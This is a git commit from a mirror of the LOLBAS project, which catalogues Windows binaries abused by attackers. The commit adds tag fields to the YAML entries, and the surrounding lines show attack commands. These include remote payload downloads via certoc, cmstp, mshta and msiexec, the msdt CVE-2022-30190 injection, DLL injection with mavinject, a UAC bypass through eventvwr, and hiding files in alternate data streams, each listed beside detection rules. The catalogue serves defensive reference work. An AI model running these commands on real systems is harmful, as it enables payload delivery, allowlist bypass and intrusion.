mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 23:09:06 +01:00
* Adding various tags as a first iteration * Adding quotes * Adding 'Custom Format' properly * Updating to key:value pairs * Update template
This commit is contained in:
parent
a945bac6be
commit
ebbf08ec4d
1
.github/workflows/gh-pages.yml
vendored
1
.github/workflows/gh-pages.yml
vendored
@ -20,6 +20,7 @@ jobs:
|
||||
mv yml/OSBinaries yml/Binaries
|
||||
mv yml/OSLibraries yml/Libraries
|
||||
mv yml/OSScripts yml/Scripts
|
||||
rm -r yml/HonorableMentions
|
||||
|
||||
- name: Deploy to LOLBAS-Project.github.io repo
|
||||
uses: peaceiris/actions-gh-pages@v3
|
||||
|
@ -57,6 +57,14 @@ mapping:
|
||||
"OperatingSystem":
|
||||
type: str
|
||||
required: true
|
||||
"Tags":
|
||||
type: seq
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
regex;(^[A-Z]):
|
||||
type: str
|
||||
required: false
|
||||
"Full_Path":
|
||||
type: seq
|
||||
required: true
|
||||
|
@ -13,6 +13,8 @@ Commands:
|
||||
Privileges: Required privs
|
||||
MitreID: T1055
|
||||
OperatingSystem: Windows 10 1803, Windows 10 1703
|
||||
Tags:
|
||||
- Key1: Value1 # Optional field for one or more tags
|
||||
- Command: The second command
|
||||
Description: Description of the second command
|
||||
Usecase: A description of the usecase
|
||||
|
@ -5,12 +5,14 @@ Author: 'Wade Hickey'
|
||||
Created: 2020-12-02
|
||||
Commands:
|
||||
- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
|
||||
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>
|
||||
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
|
||||
Detection:
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows Server 2022
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
|
||||
Description: Downloads text formatted files
|
||||
Usecase: Download scripts, webshells etc.
|
||||
@ -21,8 +23,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\certoc.exe
|
||||
- Path: c:\windows\syswow64\certoc.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml
|
||||
- IOC: Process creation with given parameter
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Input: INF
|
||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Input: INF
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmstp.exe
|
||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||
|
@ -12,12 +12,14 @@ Commands:
|
||||
MitreID: T1567
|
||||
OperatingSystem: Windows 10
|
||||
- Command: ConfigSecurityPolicy.exe https://example.com/payload
|
||||
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
||||
Description: It will download a remote payload and place it in INetCache.
|
||||
Usecase: Downloads payload from remote server
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
|
||||
|
@ -11,11 +11,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.002
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\control.exe
|
||||
- Path: C:\Windows\SysWOW64\control.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml
|
||||
|
@ -11,11 +11,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cscript.exe
|
||||
- Path: C:\Windows\SysWOW64\cscript.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
|
||||
Tags:
|
||||
- Type: Compression
|
||||
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
|
||||
Description: Download and compress a remote file and store it in a cab file on local machine.
|
||||
Usecase: Download and compress into a cab file.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
|
||||
Tags:
|
||||
- Type: Compression
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\diantz.exe
|
||||
- Path: c:\windows\syswow64\diantz.exe
|
||||
|
@ -11,11 +11,11 @@ Commands:
|
||||
Privileges: DNS admin
|
||||
MitreID: T1543.003
|
||||
OperatingSystem: Windows server
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Dnscmd.exe
|
||||
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml
|
||||
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1548.002
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Application: GUI
|
||||
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
|
||||
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
|
||||
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: Administrator
|
||||
MitreID: T1548.002
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Application: GUI
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\eventvwr.exe
|
||||
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
||||
|
@ -28,8 +28,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Expand.exe
|
||||
- Path: C:\Windows\SysWOW64\Expand.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
|
||||
|
@ -11,11 +11,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
||||
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml
|
||||
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
|
||||
Description: Copy the source file to the destination file and overwrite it.
|
||||
Usecase: Download file from UNC/WEBDav
|
||||
|
@ -5,12 +5,14 @@ Author: 'Wade Hickey'
|
||||
Created: 2020-03-05
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
|
||||
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
|
||||
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
|
||||
Detection:
|
||||
|
@ -11,6 +11,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Input: Custom Format
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
Usecase: Use to execute code and bypass application whitelisting
|
||||
@ -18,13 +21,18 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Input: Custom Format
|
||||
- Command: InstallUtil.exe https://example.com/payload
|
||||
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
||||
Description: It will download a remote payload and place it in INetCache.
|
||||
Usecase: Downloads payload from remote server
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: jsc.exe /t:library Library.js
|
||||
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
|
||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
|
||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Hide data compressed into an alternate data stream
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
|
||||
Description: Download and compresses the target file and stores it in the target file.
|
||||
Usecase: Download file and compress into a cab file
|
||||
@ -25,11 +29,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\makecab.exe
|
||||
- Path: C:\Windows\SysWOW64\makecab.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.013
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
|
||||
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
|
||||
Usecase: Inject dll file into running process
|
||||
@ -18,11 +20,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mavinject.exe
|
||||
- Path: C:\Windows\SysWOW64\mavinject.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml
|
||||
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
||||
|
@ -25,6 +25,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: msbuild.exe project.proj
|
||||
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
|
||||
Usecase: Execute project file that contains XslTransformation tag parameters
|
||||
@ -32,6 +34,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: msbuild.exe @sample.rsp
|
||||
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
|
||||
Usecase: Bypass command-line based detections
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Application: GUI
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
Usecase: Execute code bypass Application whitelisting
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Application: GUI
|
||||
- Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
|
||||
Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
|
||||
Usecase: Execute code bypass Application allowlisting
|
||||
@ -25,6 +29,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Application: GUI
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Msdt.exe
|
||||
- Path: C:\Windows\SysWOW64\Msdt.exe
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.005
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
|
||||
Description: Executes VBScript supplied as a command line argument.
|
||||
Usecase: Execute code
|
||||
@ -32,13 +34,17 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.005
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: mshta.exe https://example.com/payload
|
||||
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
||||
Description: It will download a remote payload and place it in INetCache.
|
||||
Usecase: Downloads payload from remote server
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mshta.exe
|
||||
- Path: C:\Windows\SysWOW64\mshta.exe
|
||||
|
@ -25,6 +25,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: msiexec /z "C:\folder\evil.dll"
|
||||
Description: Calls DLLUnregisterServer to un-register the target DLL.
|
||||
Usecase: Execute dll files
|
||||
@ -32,6 +34,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
|
||||
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
|
||||
Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
|
||||
@ -42,8 +46,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml
|
||||
|
@ -11,11 +11,11 @@ Commands:
|
||||
Privileges: Admin
|
||||
MitreID: T1546.007
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\WINDOWS\System32\Netsh.exe
|
||||
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml
|
||||
- Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.008
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: |
|
||||
odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2"
|
||||
odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
|
||||
@ -20,6 +22,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.008
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: odbcconf -f file.rsp
|
||||
Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
|
||||
Usecase: Execute dll file using technique that can evade defensive counter measures
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: Administrator
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
|
||||
Detection:
|
||||
|
@ -18,6 +18,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
|
||||
Description: Open the target .CPL file with the Program Compatibility Assistant.
|
||||
Usecase: Execution of CPL files
|
||||
@ -27,8 +29,6 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcalua.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml
|
||||
Resources:
|
||||
|
@ -12,12 +12,14 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: Presentationhost.exe https://example.com/payload
|
||||
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
||||
Description: It will download a remote payload and place it in INetCache.
|
||||
Usecase: Downloads payload from remote server
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Presentationhost.exe
|
||||
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
|
||||
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
|
||||
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
|
||||
Detection:
|
||||
|
@ -11,10 +11,10 @@ Commands:
|
||||
Privileges: User, Administrator in Windows 8
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rasautou.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml
|
||||
- IOC: rasautou.exe command line containing -d and -p
|
||||
|
@ -11,6 +11,9 @@ Commands:
|
||||
Privileges: Local Admin
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Input: Custom Format
|
||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
@ -18,13 +21,14 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Input: Custom Format
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||
